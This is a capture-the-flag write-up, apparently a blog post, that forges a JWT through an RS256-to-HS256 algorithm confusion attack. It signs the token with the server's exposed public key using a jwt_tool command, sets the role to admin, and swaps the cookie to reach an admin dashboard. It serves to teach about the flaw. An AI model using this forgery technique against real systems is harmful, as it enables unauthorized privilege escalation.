SecurityBoat posted the following CTF challenge on their Twitter account.
The challenge was to get to the admin dashboard and retrieve the flag. Initial credentials were provided on the login screen.
Upon logging in, we see two cookies being returned from the server: auth and pubkey.
The auth cookie is clearly a JWT token, so we can use a tool like jwt.io to inspect its contents.
Notably, the token uses RS256 (asymmetric) encryption and specifies a role field within its payload.
Upon logging in, we are redirected to http://ctf.securityboat.in:4000/jwt/user/home.php.
With all that said, our likely attack methodology is the following:
- Replace the
uservalue withadminwithin therolefield of the token, - Find a way to sign the token
- Using the token, navigate to
http://ctf.securityboat.in:4000/jwt/admin/home.php
Since we know the public key used in the RS256 encryption, we can attempt an algorithm confusion attack. This type of attack takes advantage of inexact token handling on the backend, by replacing the alg field in the token header with HS256 and using the exposed public key as an HMAC key. We can use jwt.io for modifying the necessary fields (role and alg) and sign the token with JWT_Tool.
The command to do so looks like the following:
python3 jwt_tool.py INSERT_MODIFIED_TOKEN_HERE -S hs256 -k public_key.pem
..where public_key.pem is the file that contains the RSA public key returned from the server during initial login (make sure to URL-decode the key before saving).
After JWT_Tool returns the tampered token, we can use Chrome to modify the cookies within the current session:
After navigating to http://ctf.securityboat.in:4000/jwt/admin/user.php, we get the flag.
Top comments (0)